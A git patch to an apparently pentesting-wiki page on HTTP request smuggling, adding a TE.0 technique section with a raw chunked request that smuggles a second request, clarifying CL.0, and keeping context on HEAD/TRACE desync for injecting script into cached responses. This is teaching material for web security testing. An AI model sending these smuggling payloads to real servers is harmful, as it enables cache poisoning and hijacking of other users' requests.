From 8cf94635c266ca5618a9f4da65ea92c04bee9a14 Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 29 Jul 2024 13:32:14 +0000 Subject: [PATCH] GITBOOK-4372: No subject --- .../http-request-smuggling/README.md | 45 +++++++++++++++---- 1 file changed, 37 insertions(+), 8 deletions(-) diff --git a/pentesting-web/http-request-smuggling/README.md b/pentesting-web/http-request-smuggling/README.md index 44cf0c324..535f07ed6 100644 --- a/pentesting-web/http-request-smuggling/README.md +++ b/pentesting-web/http-request-smuggling/README.md @@ -1,8 +1,8 @@ # HTTP Request Smuggling / HTTP Desync Attack {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -60,6 +60,10 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex ![https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg) +{% hint style="info" %} +To the previous table you should add the TE.0 technique, like CL.0 technique but using Transfer Encoding. +{% endhint %} + #### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End) * **Front-End (CL):** Processes the request based on the `Content-Length` header. @@ -137,7 +141,7 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex : chunked ``` -#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End):** +#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)** * Both servers process the request based solely on the `Content-Length` header. * This scenario typically does not lead to smuggling, as there's alignment in how both servers interpret the request length. @@ -152,9 +156,9 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex Normal Request ``` -#### **CL != 0 Scenario:** +#### **CL.0 Scenario** -* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. +* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. The back-end ignores the `Content-Length` header (which is treated as 0), but the front-end parses it. * It's crucial in understanding and crafting smuggling attacks, as it influences how servers determine the end of a request. * **Example:** @@ -167,6 +171,30 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex Non-Empty Body ``` +#### TE.0 Scenario + +* Like the previous one but using TE +* Technique [reported here](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/) +* **Example**: + +``` +OPTIONS / HTTP/1.1 +Host: {HOST} +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 +Transfer-Encoding: chunked +Connection: keep-alive + +50 +GET HTTP/1.1 +x: X +0 +EMPTY_LINE_HERE +EMPTY_LINE_HERE +``` + #### Breaking the web server This technique is also useful in scenarios where it's possible to **break a web server while reading the initial HTTP data** but **without closing the connection**. This way, the **body** of the HTTP request will be considered the **next HTTP request**. @@ -550,7 +578,7 @@ X-Forwarded-For: xxx.xxx.xxx.xxx ``` An example on how to abuse this behaviour would be to **smuggle first a HEAD request**. This request will be responded with only the **headers** of a GET request (**`Content-Type`** among them). And smuggle **immediately after the HEAD a TRACE request**, which will be **reflecting the sent dat**a.\ -As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response. \ +As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response.\ This response will be sent to the next request over the connection, so this could be **used in a cached JS file for example to inject arbitrary JS code**. ### Abusing TRACE via HTTP Response Splitting @@ -735,10 +763,11 @@ def handleResponse(req, interesting): * [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html) * [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/) * [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack) +* [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)